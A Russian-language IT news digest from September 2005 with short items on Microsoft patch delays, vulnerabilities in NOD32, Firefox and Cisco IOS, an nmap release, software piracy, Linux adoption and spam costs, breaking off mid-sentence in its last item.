Корпорация Microsoft приняла решение отказаться от выпуска сентябрьской серии патчей для уязвимостей в своем программном обеспечении, сообщает "Компьюлента". Как отмечается в официальном уведомлении, новая порция заплаток выйдет только 11 октября. На прошлой неделе на веб-сайте Microsoft появилась информация о том, что 13 сентября, во вторник будет выпущено очередное обновление для операционных систем Windows. Патч должен был закрыть новую уязвимость, которой Microsoft присвоила рейтинг критически опасной. Это означает, что дыра теоретически может использоваться злоумышленниками с целью получения несанкционированного доступа к удаленному компьютеру. Тем не менее, обещанную заплатку пользователи Windows пока так и не получили. Microsoft объяснила данную ситуацию неожиданно возникшими проблемами и необходимостью дополнительного тестирования апдейта. Стоит добавить, что ранее Microsoft уже отказывалась от ежемесячного выпуска заплаток. В частности, обновления не были представлены в декабре 2003 года, а также в марте нынешнего года.
Подробности и отзывы специалистов

14/09/2005 10:52 Конференция Microsoft осталась без света из-за аварии
В понедельник днем отдельные районы Лос-Анджелеса, включая место проведения конференции профессиональных разработчиков Microsoft, погрузились во тьму в результате серьезной энергетической аварии. Свет отключился примерно в 12:30 и включился только после 14. Менеджер по группе продуктов Microsoft Грег Салливан проводил брифинг, посвященный Windows Vista, когда погасла его презентация Powerpoint и большинство ламп в Los Angeles Convention Center. «У нас пока нет программного решения на этот случай», — сказал Салливан. «Проклятое энергоснабжение на базе Linux», — выругался один из присутствующих, прежде чем стало известно, что напряжение пропало не только в конвеншн-центре. Представитель пожарной службы Лос-Анджелеса сообщил Fox News, что сотрудники департамента водо- и энергоснабжения случайно перерезали силовой кабель, и его пришлось восстанавливать. Конференция официально начинается во вторник, но уже в понедельник на некоторых предварительных семинарах собралось много участников. В числе прочего ожидается, что Microsoft расскажет о деталях своей стратегии «веб-платформы», посредством которой компания планирует привлечь разработчиков к созданию приложений, опирающихся на ее ресурсы MSN.
Подробности

13/09/2005 14:39 Ислам Каримов распорядился начать войну с хакерами
В Узбекистане при Центре развития и внедрения компьютерных и информационных технологий будет создана служба реагирования на компьютерные инциденты. Эта структура, как сообщили ИА Regnum в Узбекском агентстве связи и информатизации, создается в соответствии с постановлением президента страны Ислама Каримова, решившего объявить хакерам войну. "В основные задачи Службы будет входить координация действий подразделений компьютерной безопасности операторов, провайдеров и других субъектов национальной информационной сети по вопросам предотвращения правонарушений в области использования компьютерных и информационных технологий", - подчеркнул представитель агентства. Новая служба будет осуществлять сбор, анализ и накопление в соответствующих базах данных информации о возникающих угрозах компьютерной безопасности, получаемой от пользователей, производителей компьютерной техники и программного обеспечения, аналогичных зарубежных структур, а также материалов по конкретным компьютерным инцидентам. В компетенцию службы войдет также взаимодействие и сотрудничество с соответствующими структурами по вопросам компьютерных преступлений и правового обеспечения информационной безопасности, зарубежными центрами CERT (службы противодействия сетевым угрозам), обмен информацией и опытом работы.
Lenta.Ru

13/09/2005 13:45 Решение для быстрого развертывания точки публичного доступа WiFi-Hotspot.
Специалистами компании NetUP разработано принципиально новое решение, позволяющее быстро развернуть точку публичного доступа в интернет (WiFi-hotspot), не прибегая к использованию дорогостоящего оборудования и привлечению квалифицированных технических специалистов. Для организации точки NetUP WiFi-hotspot достаточно иметь любое подключение к интернету, обычный компьютер и WiFi точку доступа любого типа. Наличие жесткого диска в компьютере не требуется. Загрузка компьютера производится с NetUP Live Hotspot CD, созданного на базе Gentoo Linux. Диск распространяется бесплатно (образ можно скачать с сайта). Благодаря использованию фактически непортящегося носителя, сервер на основе NetUP Live Hotspot CD отличается исключительной устойчивостью. Также описан процесс построения WiFi-hotspot.
Подробности

13/09/2005 13:25 Чем Firefox лучше IE?
На этот вопрос попытался в своём интервью ответить Блейк Росс - один из создателей всё больше набирающего популярность браузера Firefox. Интервью переведено и опубликовано на сайте THG.RU.
Интервью

13/09/2005 12:20 Обзор внутреннего устройства файловой системы XFS
Opennet.ru в очередной раз порадовал интересной статьёй "Масштабируемость в файловой системе XFS", в которой описывается архитектура и реализация файловой системы XFS. В центре внимания обзора находятся механизмы, используемые XFS для обеспечения мощной и производительной поддержки очень больших файловых систем (Very Large File System – VLFS). Поддержка VLFS включает в себя поддержку больших файлов, множества файлов, больших директорий и высокопроизводительных операций ввода/вывода. В обсуждение используемых в XFS механизмов включены как описания специфичных дисковых (on-disk) структур данных, так и анализ причин, по которым именно они были выбраны. Детально обсуждается широкое применение B+ деревьев, в том числе и в тех местах, где традиционно используются линейные структуры данных.
Cтатья

13/09/2005 11:46 Ваня Свайсер: антивирусы - не панацея
Представитель британского поставщика решений по ИТ-безопасности Sophos Ваня Свайсер предупредил пользователей о том, что не стоит полагаться на антивирусные программы как на панацею. По его мнению, помимо вирусов существуют и другие серьезные ИТ-угрозы. Старший вирусолог Sophos Ваня Свайсер (Vanjer Svajcer) заявил на конференции System Security Association в Лондоне, что на антивирусы нельзя полагаться в 99% случаев. «Проблема в том, что мы должны увидеть вирус, чтобы научиться определять его. Даже если антивирусная программа на месте, она может и не определить вирус», — сказал Ваня Свайсер. Хакеры, по словам Свайсера, становятся все более избирательными в атаках при помощи вредоносных программ, однако пользователи по старинке уделяют внимание только почтовым вирусам. Кроме почтовых вирусов, сказал специалист, есть еще так называемые «боты» — вирусы, которые проникают в онлайн через чат-серверы IRC и ожидают команд хозяина: «Многие люди знают о почтовых вирусах, поскольку те широко освещаются. Но боты работают „ниже радара“, и пользователи не знают, как их много на самом деле». В следующем году, предполагает Свайсер, вирусописатели будут создавать более совершенных ботов, поскольку администрация чат-серверов IRC отслеживает и отключает доступ вирусов к онлайну, лишая владельца «ботнета» (сети ботов) управления. Единственная надежда — на улучшение алгоритмов определения вирусов как вида, вместо обнаружения уже пойманных по уникальным участкам кода — сигнатурам. Прим. ньюсмейкера: Перевод имени Vanjer, как Ваня оставляем на совести первоисточника.
CNews

13/09/2005 11:18 Никлаус Вирт в России
13 сентября Никлаус Вирт посетит Cанкт-Петербургский государственный университет информационных технологий, механики и оптики, где прочитает лекцию, а также примет участие в церемонии вручения ему мантии Почетного доктора ЛИТМО. 21 сентября Никлаус Вирт, приезд которого приурочен к празднованию 250-летия МГУ им.Ломоносова и 150-летия швейцарского ETH (Высшей Политехнической школы), выступит с лекцией "История и перспективы языка Оберон" (A History and Perspective of the Programming Language Oberon) в Большой аудитории Политехнического музея в Москве. В стенах этой аудитории когда-то проводили свои лекции Нильс Бор, Норберт Винер, а также выдающиеся представители отечественной научной мысли - П.Л.Капица, И.Е.Тамм, Н.Г.Басов, академики С.И.Вавилов, О.Ю.Шмидт, И.И.Артоболевский и многие другие. Вирт планирует преподнести в дар Политехническому музею свой уникальный компьютер Lilith (за его разработку и за создание языка Паскаль в 1984 году Никлаус Вирт был удостоен престижнейшей в компьютерном мире премии Алана Тьюринга), созданный в Европе в 1980 году и опередивший аналогичные разработки крупнейших компаний более чем на 10 лет. После окончания лекции состоится пресс-конференция, посвященная, в основном, российскому турне Вирта, 35-летию языка Паскаль, 25-летию компьютера Lilith и 15-летию языка Оберон. Поездка Вирта по России, которая продлится почти месяц, включает выступления в следующих городах: Санкт-Петербург (13 сентября), Москва (19 сентября), Нижний Новгород (26 сентября), Екатеринбург (29 сентября), Новосибирск (3 октября), Томск (5 октября).
Подробнее о программе и участии

13/09/2005 11:09 Microsoft распространит "ранние" сборки будущих программ среди разработчиков
На конференции Professional Developers Conference, которая начинается в эти дни в Лос-Анджелесе, Microsoft планирует представить сторонним разработчикам возможность взглянуть на раннюю сборку ОС Windows Vista, которая планируется к выходу в следующем году, а также на Visual Studio 2005 и SQL Server 2005, которые появятся на рынке в ноябре текущего года, cообщает "Компьюлента". Распространение программ начнётся во вторник утром, после выступления Билла Гейтса и Джима Олчина. Кроме того, руководство компании планирует раскрыть некоторые подробности относительно разработки 12-й по счёту версии Microsoft Office, и сподвигнуть сторонних разработчиков на создание дополнительных надстроек для Office. Подразделение MSN, со своей стороны, планирует опубликовать API для нескольких своих веб-сервисов, включая MSN Search и Messenger, и в дополнение к этому - открыть новый сайт специально для разработчиков.
Подробности

13/09/2005 10:46 Уязвимость в антивирусе NOD32
Tan Chew Keong из Secunia Research сообщил о наличии уязвимости в антивирусном продукте NOD32, которая связана с ошибкой обработки ARJ-архива, содержащего файлы с очень длинными именами. При обработке подобного архива может возникнуть переполнение буфера в куче, что позволти выполнить произвольный код в системе. Однако, необходимо, чтобы в настройках антивируса было разрешено сканирование архивов. Уязвимость присутствует в версии 1.033 build 1127 и устранена в выпущенной 2 сентября версии 1.034 build 1132.
Описание

13/09/2005 10:03 Novell: Vista подтолкнет пользователей к Linux
Джек Мессман утверждает, что решающим моментом для настольной Linux станет конец будущего года, когда компании столкнутся с расходами, связанными с переходом на Windows Vista. В понедельник компания Novell заявила, что высокие расходы, связанные с переходом с Windows XP на Windows Vista, станут катализатором, который побудит компании всерьез рассмотреть вопрос о переводе рабочих мест на Linux. Выступив на ежегодной европейской конференции Brainshare в Барселоне, глава Novell Джек Мессман заявил, что расходы, связанные с переводом рабочих мест на следующую версию Windows, значительно превзойдут расходы по переходу на Linux. Novell утверждает, что она уже сейчас делает реальные успехи в области настольной Linux в Европе и что многие организации выбирают ее продукт Linux Desktop, особенно на вертикальных рынках в тех отраслях, где требуются закрытые клиентские рабочие станции с ограниченными возможностями. «Вместо универсального подхода, Novell Desktop можно настроить так, чтобы она точно подходила для тех или иных рабочих мест, — сказал генеральный менеджер Novell по платформам open source Дэвид Патрик. — Так что организации, наконец, получили надежную и экономически эффективную альтернативу Windows, которая работает на окупаемость инвестиций заказчиков, а не на собственную программу лицензирования поставщика». Мессман добавил, что переход на настольную Linux имеет как технические, так и экономические преимущества. А тот факт, что настольная Linux-среда от Novell обладает ограниченной функциональностью по сравнению с Microsoft Office, на самом деле играет позитивную роль. Определенные функции Office способствуют непроизводительной трате рабочего времени, так как облегчают сотрудникам посещение не относящихся к делу сайтов. «Неужели вам хочется платить за все те лишние функции, которые есть в Windows, да к тому же отвлекающие ваших сотрудников и снижающие производительность труда?» — спросил он.
Подробности

12/09/2005 12:58 Новая версия пакета Internet Security Suite от McAfee
В минувший четверг компания McAfee анонсировала очередную версию пакета Internet Security Suite 2006. Продукт предоставляет пользователям комплексную защиту и доступен для скачивания с сайта McAfee по цене в 70 долларов США. Internet Security Suite защитит от несанкционированного доступа и внешних атак, позволяет блокировать нежелательные всплывающие окна, фильтровать содержимое веб-сайтов и электронной корреспонденции. Cреди достоинств пакета, отмеченных в пресс-релизе компании, также автоматическая идентификация и блокировка вирусов, троянов и шпионского ПО. Блокирование шпионских программ происходит до запуска самой вредоносной программы, защита от фишинга организуется фильтрованием не только содержимого электронных писем, но и контента подозрительных, с точки зрения программы, веб-сайтов. Internet Security Suite предупреждает пользователя об отсылке на удаленный ресурс личной конфиденциальной информации, а также блокирует спам. Доступно ежедневное автоматическое обновление продукта. Коробочная версия Internet Security Suite 2006 появится в октябре и будет стоить 70 долларов США. Лицензия на установку на три машины обойдется в 130 долларов. О других вариантах поставки пока не сообщается.
"Компьюлента"

12/09/2005 12:26 VPN-шлюз от WatchGuard и Citrix
Компании WatchGuard Technologies и Citrix Systems выпустили предназначенный для малых и средних предприятий шлюз виртуальных частных сетей WatchGuard Firebox SSL Core VPN Gateway, оснащенный средствами Citrix Secure Access. В данном решении технология безопасного доступа Citrix SSL VPN реализуется на разработанной WatchGuard аппаратной платформе Firebox. Предусмотрена возможность эксплуатации шлюза в двух режимах доступа - клиент Secure Access и Kiosk. В первом пользователи могут обращаться к любому приложению или сетевому ресурсу, а в режиме Kiosk они получают возможность защищенного доступа к средствам для работы с протоколами Citrix ICA, Remote Desktop, SSH, к эмулятору Telnet 3270, к серверам VNC и к любым другим доступным через Web сетевым ресурсам. Также в режиме клиента Secure Access предусмотрена возможность аварийного переключения на другие шлюзы Firebox SSL VPN Gateway.
"Открытые системы"

12/09/2005 12:12 Критическая уязвимость Windows осталась непропатченной
Microsoft заявила, что не будет выпускать в сентябре патч на критическую уязвимость в Windows, несмотря на данные ранее обещания. Подробная информация о данной уязвимости не разглашается. В корпорации признали ее существование. «Дыре» присвоен высший рейтинг опасности — «критическая», что значит, что она может эксплуатироваться без участия пользователя. На прошлой неделе Microsoft выпустила бюллетень безопасности, в котором предупредила о готовящемся выходе соответствующего патча, однако сейчас заявила обратное. Решение принято в связи с недоработанностью патча. В прошлом месяце вышли 6 патчей Microsoft, один из которых закрывал еще одну критическую уязвимость Windows.
CNews

12/09/2005 11:48 Новости от проекта NetBSD
Команда релиз инженеров NetBSD сообщила о готовности к тестированию 3-его кандидата в релизы NetBSD 2.1-RC3, cообщает opennet.ru. Примерно через неделю будет готов 4-ый кандидат в релизы, и через 2 - 3 недели окончательный релиз NetBSD 2.1. В списке рассылки netbsd-advocacy один из пользователей NetBSD поделился своими впечатлениями и опытом использования этой ОС на серверах в крупной компании. Julio M. Merino Vidal, работавший в рамках программы Google "Summer of Code" над реализацией tmpfs в NetBSD, сообщил о завершении работы. tmpfs была включена в дерево исходного кода NetBSD. Основной целью разработки этой файловой системы была реализация её функционирования только с необходимым объёмом памяти, т.е. памяти выделяется не больше и не меньше чем реально нужно.
Подробнее

12/09/2005 11:06 Отчет: open source еще далеко до мейнстрима
Несмотря на достигнутый прогресс в области коммерциализации платформы open source, ей потребуется еще до пяти лет, чтобы стать традиционным компонентом корпоративных ИТ-инфраструктур, утверждает Gartner. Последний отчет Gartner об успехах Linux показывает, что ПО open source находится на полпути к зрелости, однако аналитическая фирма предупреждает, что главным испытанием станет его способность продемонстрировать необходимый уровень производительности и безопасности при работе в качестве сервера центра обработки данных для ответственных приложений. Пока передовые предприятия, как правило, находятся на ранних стадиях освоения Linux, но к концу 2005 года Gartner ожидает усиления коммерциализации и повышения качества системного управления и управления устройствами хранения данных. Сейчас Linux используется главным образом для приложений WebSphere и инфраструктуры на мэйнфреймах и для веб-сервисов на blade-серверах и серверах в стойках. На рабочих местах Linux приживается труднее. По мнению Gartner, операционная система достигла той точки, в которой расходы на переход могут превысить экономию, к тому же излишний энтузиазм и нереалистичные ожидания привели к тому, что число неудачных примеров внедрения превышает число успешных. Gartner подчеркивает неоднородность в движении open source: одни сектора рынка, такие как blade-серверы и кластерные серверы, переживают уверенный рост, тогда как другие отстают из-за недостаточного богатства средств управления и обеспечения доступности.
Подробности

12/09/2005 10:50 China Telecom объявил войну интернет-телефонии
Крупнейший китайский телефонный и интернет-оператор China Telecom вступил в борьбу с интернет-телефонией, сообщает АР со ссылкой на газету Beijing Business Today. Эксперты China Telecom пришли к выводу, что программы, подобные Skype, которые позволяют пользователям компьютеров бесплатно разговаривать через интернет, представляют для доходов компании значительную угрозу, и намерены не допустить их распространения в Китае. В ближайшем будущем China Telecom намерен заблокировать для китайских пользователей доступ к серверу Skype, а также ввести жесткий контроль объема передаваемых данных, чтобы вычислять и отключать тех, кто пытается использовать подключение к интернету, предоставляемое компанией, для голосового общения. Как предполагается, все необходимые механизмы контроля будут налажены и вступят в действие уже в 2006-2007 годах.
Подробности

11/09/2005 15:02 Изменяется порядок удаления доменов из Реестра домена RU
Как сообщает РосНИИРОС, с 12 сентября 2005 Технический Центр домена RU будет производить удаление домена из Реестра на следующий день после установленной даты его освобождения, указанной в поле free-date информации Whois-service о домене. Удаление доменов из Реестра будет производиться после 19:30. Удаление неоплаченного домена из Реестра в дату free-date будет производиться Регистратором. Кроме того, теперь Регистратор будет иметь возможность продлить срок регистрации домена и в дату free-date. Как и прежде, настоящая дата освобождения домена может в некоторых случаях не совпадать с плановой, поскольку домены не удаляются по выходным дням и в дни, следующие за выходными.
РосНИИРОС

11/09/2005 13:07 Novell анонсирует SUSE Linux 10.0
Компания Novell анонсировала грядущее появление новой версии дистрибутива SUSE Linux — 10.0. Продажи ожидаются в начале октября этого года. SUSE Linux 10.0 — первый релиз, созданный при содействии недавно стартовавшого проекта openSUSE, спонсируемого Novell и поддерживаемого главным образом Linux-сообществом. Среди заявленных программных пакетов в SUSE Linux 10.0: web-браузер Mozilla Firefox, офисный пакет OpenOffice.org 2.0 (Beta), клиенты для работы с электронной почтой и мгновенного обмена сообщениями, графические утилиты, приложения для управления, программы из области ИТ-безопасности (для фильтрации спама, защиты от вирусов и т.п.). Из новых и обновленных возможностей отмечается система поиска информации на ПК Beagle, а также аудиоплейер Amarok с поддержкой MP3 «из коробки».
Nixp.Ru

11/09/2005 12:44 Программные интерфейсы для MSN
Microsoft собирается опубликовать в ближайшие дни набор API для работы с различными поисковыми и коммуникационными службами MSN. Программные интерфейсы MSN Search Web Services API дадут разработчикам доступ к результатам поиска на портале MSN: это поиск в вебе, картографический, локальный поиск и другая информация. Будет также опубликованы интерфейсы к картографическому спутниковому сервису MSN Virtual Earth. Интерфейсы MSN Messenger Activity API позволят сторонним разработчикам создавать дополнительные сервисы для фирменного IM-пейджера, такие как переводчик мгновенных сообщений в реальном режиме времени (работа над ним уже идет, по словам представителей Microsoft). Появление подобных «плагинов», безусловно, увеличит популярность MSN Messenger. Набор API будет представлен 13 сентября на конференции для разработчиков Microsoft Professional Developers Conference (PDC). В этот день вся информация появится в специальном разделе на сайте MSDN.
Cтраница

11/09/2005 11:52 IBM модернизирует Notes и Domino
В среду отделение IBM Lotus выпустило очередные версии своего настольного программного обеспечения обработки сообщений Notes 7 и серверного ПО коллективной работы Domino 7. Big Blue добавила в клиентское ПО свыше 100 новых функций, многие из которых предназначены для управления большими объемами данных, стекающихся в почтовый ящик. В серверном ПО расширено число параметров настройки e-mail, добавлены средства для сохранения и открытия документов разного типа прямо из Notes, а новые визуальные индикаторы помогают пользователям организовывать сообщения и манипулировать ими. Кроме того, IBM расширила доступ из разных частей системы Notes к клиенту оперативного обмена сообщениями (IM). В Domino 7 расширены возможности и по созданию новых приложений коллективной работы на базе Notes. Компания обновила набор инструментов разработки ПО, улучшив интеграцию с проектами на основе архитектуры веб-сервисов (SOA). Например, разработчики смогут использовать Domino 7 в качестве «центра веб-сервисов» (Web services host) для инструментов, предназначенных для расширения существующих функций Notes. IBM утверждает, что некоторые заказчики Domino 7 смогут увеличить число пользователей, обслуживаемых сервером, на 50%, и чтобы справиться с той же нагрузкой, серверу потребуется на 25% меньше обрабатывающей мощности.
Подробнее

11/09/2005 11:19 Mozilla исправляет свежую ошибку в Firefox
Mozilla Foundation выпустила патч и инструкции для обхода недавно обнаруженной уязвимости в Firefox, связанной с обработкой интернациональных символов в URL, cообщает bugtraq.ru. Уязвимы были все версии вплоть до 1.06, и даже 1.5 Beta 1.
Подробности

11/09/2005 10:41 В Самаре конфисковали миллион пиратских CD
За последние несколько недель правоохранительные органы изъяли в Самаре около миллиона CD с нелицензионными копиями компьютерных программ. Диски были обнаружены в результате обысков, проведенных по результатам оперативных мероприятий. По факту изъятия горпрокуратура возбудила уголовное дело по статье 146 УК ("нарушение авторских и смежных прав"). Кому принадлежит склад, в МВД не называют, пишет газета "Ведомости". На месте обысков следователи обнаружили упаковочную технику и акцизные марки. Авторские права на изъятые диски принадлежат фирмам "1С", "Аскон", Microsoft и другим российским и зарубежным правообладателям. По предварительной оценке, стоимость конфискованной партии CD составила около 100-150 млн. рублей. По словам заместителя прокурора Самары Дмитрия Евланова, обыски еще не закончены. Согласно данным представителей правообладателей, диски изъяты на складе, предположительно принадлежащем самарской группе компаний "Союз". В нее входит ряд компаний под брендом "Союз" - ИФК "Союз", ТЭК "Союз", ЧОП "Союз-безопасность", "Алекскомбанк", а также оптово-розничный магазин по продаже лазерных дисков. Миллион пиратских дисков - это одна из самых крупных партий контрафакта, конфискованных в России. Однако эксперты сомневаются в достоверности этой цифры, поскольку спрос на рынке Самары едва ли оправдывает хранение на складах более 300000 дисков.
Источник

11/09/2005 10:17 Производителя карманной ОС PalmOS покупают японцы
Японская компания Access - производитель программных решений для мобильных устройств - объявила о намерении приобрести американскую компанию PalmSource, занимающуюся разработкой и дистрибьюцией программ для популярной карманной компьютерной платформы Palm, сообщает Associated Press. PalmSource является производителем самой операционной системы PalmOS, использующейся в устройствах Palm. Она унаследовала эту функцию от компании Palm Computing, которая ранее производила КПК Palm и ПО для них, а впоследствии разделилась на PalmSource и PalmOne (сейчас - просто Palm), к которой отошло производство техники. Ранее PalmSource расширилась за счет приобретения китайской компании China MobileSoft, а теперь Access собирается приобрести за 324 миллиона долларов путем объединения со своим американским подраделением.
Подробности

10/09/2005 13:51 Выход NMap 3.90
Сообщается о выходе самого лучшего сетевого сканера nmap. Из нововведений:
- ускоренное ARP сканирование локальной сети
- новая опция --spoof_mac, позволяющая задать произвольный mac адрес компьютера, с которого производится сканирование
- значительно расширена база известных сервисов и портов
- значительно расширена база известных отпечатков OS
и многое другое.
Версия 3.90

10/09/2005 13:25 В Россию приехал создатель Java
Россию впервые посетил создатель языка Java Джеймс Гослинг. Визит был приурочен к состоявшейся в Санкт-Петербурге конференции Java-разработчиков, в которой приняли участие более 900 программистов. Выбор Санкт-Петербурга местом проведения конференции отнюдь не случаен - вот уже на протяжении года здесь функционирует Центр высоких технологий Sun Microsystems, в котором работают около трехсот специалистов в различных областях разработки ПО. В своем докладе Джеймс Гослинг обрисовал нынешнее состояние технологии Java, а также наметил дальнейшие пути ее развития. По его мнению, наиболее перспективной платформой для развития данной технологии являются смартфоны и другие карманные устройства. Из тематических докладов, прозвучавших на конференции, ее участники узнали о новых возможностях JDK 6.0. Кроме того, ряд докладов был посвящен инструментам Sun Microsystems для Java-разработчиков, таким как Java Studio Creator, NetBeans и Java Studio Enterprise. Отдельный семинар был посвящен развитию средств разработки для Solaris и Linux. Здесь, в частности, были представлены проект OpenSolaris и новые версии компиляторов С/С++ для открытых операционных систем.
Источник

10/09/2005 13:11 Уязвимость в Firefox
Как сообщает Secunia, Tom Ferris обнаружил уязвимость в набирающем популярность браузере, выпускаемом Mozilla - Firefox. Уязвимость связана с некорректной обработкой символа 0xAD в имени домена обрабатываемого URL. Переполнение бучера в куче может привести как к DoS, так и (потенциально) к выполнению произвольного кода в системе. Разумеется, для проведения атаки необходимо заманить жертву на специальным образом сформированную страницу. Уязвимости подвержены браузеры до версии 1.0.6.
Описание

10/09/2005 12:09 Cisco предупреждает о новой уязвимости в IOS
Производитель сетевого оборудования Cisco предупредил об уязвимости в ПО IOS Firewall Authentication Proxy, которая позволяет производить атаки DoS (отказ в обслуживании). Уязвимость связана с ошибкой при обработке данных пользователя при аутентификации во время соединений FTP и Telnet. Успешная атака может привести к перезагрузке системы или выполнению призвольного кода на уязвимой системе. Уязвимы версии IOS 12.2ZH, IOS 12.2ZL, IOS 12.3, IOS 12.3T, IOS 12.4 и IOS 12.4T. Операционная система IOS управляет сетевыми устройствами Cisco, через которые проходит большая часть мирового интернет-трафика.
CNews

10/09/2005 11:28 У Microsoft есть веб-план против Google
На будущей неделе Microsoft противопоставит своему конкуренту Google новую модель веб-разработки. Компания планирует открыть доступ к MSN и другим публичным веб-сайтам, чтобы на их основе разработчики могли создавать новые приложения, — метод, успешно используемый Google и другими веб-компаниями для наращивания своих ресурсов. Microsoft расскажет о деталях своей стратегии «веб-платформы» на предстоящей неделе на конференции разработчиков в Лос-Анджелесе. Она намерена опубликовать интерфейсы прикладных программ (API) для некоторых своих публичных веб-сайтов, включая MSN Search, и предоставить улучшенные инструменты разработки приложений. Цель — освоение новой модели, которую часто называют Web 2.0 или программируемым вебом, в которой приложения строятся с использованием элементов существующих, общедоступных веб-сайтов. Вместо того, чтобы просто предоставить доступ к веб-страницам, эти компании рассматривают свои веб-сайты как платформу разработки типа операционной системы. Например, независимые программисты могут написать приложение (mash-up), которое извлекает информацию из блога пользователя и помещает ее на карту с применением Google Maps или аналогичной службы. Однако аналитики предупреждают, что Microsoft придется балансировать на тонкой черте: признавая популярность новой веб-технологии, она должна в то же время поощрять и использование своих дойных коров — Windows и Office. Попытка привлечь к MSN больше разработчиков является продолжением конкурентной борьбы между софтверным гигантом и Google, которая борется за внимание программистов. В последние дни конфликт между двумя компаниями вылился в поединок в суде за бывшего сотрудника Microsoft Кая-Фу Ли, которого переманила Google. Онлайновые конкуренты Microsoft, особенно Google и Yahoo, уже предложили независимым веб-разработчикам стыковочные средства, позволяющие подключаться к их веб-службам, таким как поиск и географические карты. Так как эти приложения опираются на веб-браузер, теоретически они могут работать на любой операционной системе.
Подробности

10/09/2005 11:00 Пираты в России укрываются на режимных объектах
"Значительная часть преступлений в сфере интеллектуальной собственности совершается на территории режимных объектов", - заявил в пятницу на совещании с руководителями правоохранительных органов в Генпрокуратуре министр внутренних дел РФ Рашид Нургалиев. Как собщает РИА "Новости", он уточнил, что на этих объектах организовывается незаконное производство контрафактной продукции. По словам Нургалиева, аренда юридическими лицами производственных мощностей на режимных объектах была запрещена, однако до сих пор ни один договор аренды не расторгнут. Министр также считает, что судебная практика не всегда соответствует общественной опасности преступлений в данной сфере. Так, по его словам, в прошлом году за преступления в интеллектуальной сфере были осуждены 440 человек, причем из них только 11 были приговорены к лишению свободы, а остальные получили условные сроки и иные наказания. Кроме того, среди факторов, способствующих преступлениям в сфере интеллектуальной собственности, Нургалиев назвал неоправданно завышенные цены на лицензированную продукцию, отсутствие представителей правообладателей во многих городах России, а также "бездействие правоохранительных органов США и других стран в борьбе с распространением контрафакта через Интернет на их территории". Как сообщает РИА, на заседании также выступил Генпрокурор РФ Владимир Устинов. Он заявил, что милиция, по его мнению, плохо борется с нарушениями прав интеллектуальной собственности. "Кто основной сегодня борец c этой проблемой - работник милиции. Вот и надо спросить с него", - приводит агентство слова Устинова. По его мнению, правоприменительной практике законодательства в этой сфере мешает сегодня "недобросовестное отношение к служебным обязанностям". "Почему наши рынки забиты пиратской продукцией, а меры не предпринимаются? И министр внутренних дел об этом прекрасно знает и будет об этом нам говорить", - цитирует Устинова РИА. В свою очередь замгенпрокурора Сергей Фридинский назвал проблемой правоприменительной практики маленький опыт судов, недостаточную работу органов надзора и контроля в этой сфере. "Только комплекс мер и в административном законодательстве, и в уголовном законодательстве могут исправить ситуацию", - сказал Фридинский, отвечая на вопрос также присутствовавшего на совещании министра Минэкономразвития и торговли Германа Грефа.
РИА "Новости"

9/09/2005 14:36 Microsoft защитит приставку Xbox 360 от взлома
Как сообщает ВВС, компания Microsoft планирует сделать свою новую игровую консоль следующего поколения более защищенной от хакерских атак. По словам представителей компании, безопасность будет реализована на аппаратном уровне. В настоящее время многие Фаны модифицируют приставку, превращая ее в медиацентр, ставят более вместительный жесткий диск и т.д. По законам Британии подобная инициатива наказуема. Законодательство запрещает подобное усовершенствование. Незаконное усовершенствование можно произвести путем замены чипов, вставленных в консоль. Такие чипы позволяют играть в игры, купленные в другой стране, или воспроизводить скопированные диски. Уже спустя короткое время, как появилась первая приставка Xbox компьютерные умельцы стали модифицировать консоль, благодаря чему она смогла выполнять функции, изначально не планируемые Microsoft. В июле 2004 года компания Sony уже выиграла судебный процесс, в результате чего были запрещены к продаже модифицируемые чипы. В июле 005 года в Британии впервые был осужден человек по обвинению в усовершенствовании консоли. В связи с ростом случаев модификаций в компании Microsoft намерены усилить безопасность выпускаемой приставки. Другой причиной, побудившей к этому, стал также тот факт, что многие используют консоль для просмотра пиратских фильмов. Однако в то же время, специалисты компании допустили возможность того, что через некоторое время хакеры смогут сломать и эту защиту. «Вполне возможно найдутся умные головы в этом мире с достаточно дорогим оборудованием. Я уверен, что рано или поздно кто-нибудь сумеет взломать систему безопасности. Но это не значит, что данная схема будет работать и на других машинах», - сказал инженер компании Крис Сатчел. Как ожидается, поставки новых Xbox 360 начнутся уже в конце года перед новогодними праздниками. Стоимость приставки, прозванной как Core System, составит около $300. Полный комплект с аксессуарами обойдется покупателям в $400.
CNews

9/09/2005 12:19 Спамеры ежегодно крадут у россиян более 30 млн. долларов
В рамках Проекта "АнтиСпам" Российский комитет международной программы ЮНЕСКО "Информация для всех" (IFAP) провел исследование эффективности технических мер противодействия распространению спама. Специалисты оценили размер ущерб, наносимый спамом - он составляют 30 млн. долларов в год. За время исследования общий размер спамерских сообщений, полученных на каждый почтовый адрес в домене IFAP.ru, составлял от 8,4 до 11,7 Мб в месяц. Размер отдельных сообщений варьировался от 1 до 840 Кб, размер типичного спамерского сообщения находился в интервале от 4 до 46 Кб. Согласно различным оценкам, количество пользователей интернета в России составляет от 10 до 17,5 миллионов человек. В своих расчетах авторы отчета исходили из консервативной оценки количества российских пользователей интернета в 10 млн. человек, среднего объема ежемесячно получаемого спама в 10 Мб и средней цены за загрузку 1 Мб информации из интернета в 2,5 цента. При оценке ущерба от спама, авторы исходили из размера платы интернет-провайдеру за получение бесполезной информации - она составила от 2,5 млн. долларов в месяц или 30 млн. долларов в год. Отметив, что эту сумму можно смело удвоить, если учитывать ущерб, наносимый сообщениями с вирусами. За время исследования общий размер сообщений, содержащих вирусы, составил также порядка 10 Мб в месяц на каждый почтовый адрес.
Подробности

9/09/2005 11:57 Symantec «ожидает интернет-атак»
Секьюрити-фирма подняла оценку уровня опасности интернета после того, как в защите операционной системы маршрутизаторов Cisco обнаружилось слабое звено. Серьезная уязвимость программного обеспечения Cisco ставит компьютерные сети под угрозу кибератак, что вынудило поставщика защитного ПО, компанию Symantec, поднять свою оценку уровня опасности интернета. Уязвимость в Cisco Internetwork Operating System (IOS) можно использовать для взлома или дистанционного исполнения злонамеренного кода на устройствах, работающих под управлением IOS, то есть маршрутизаторах и коммутаторах Cisco, которые составляют значительную часть инфраструктуры интернета. «Успешное использование уязвимости Cisco IOS может привести к перезагрузке устройства или исполнению произвольного кода, — говорится в рекомендации Cisco. — Многократное использование может привести к продолжительной атаке типа DoS или исполнению произвольного кода». В ответ на предупреждение Cisco компания Symantec повысила свой индекс глобальной опасности ThreatCon до уровня 2, что означает ожидание атак. «Учитывая недавнее внимание к эксплуатации уязвимостей в Cisco IOS, существует вероятность, что эта проблема приведет к попыткам разработки эксплойта в ближайшем будущем», — говорится в предупреждении Symantec. Symantec и Cisco отмечают, что им не известно об 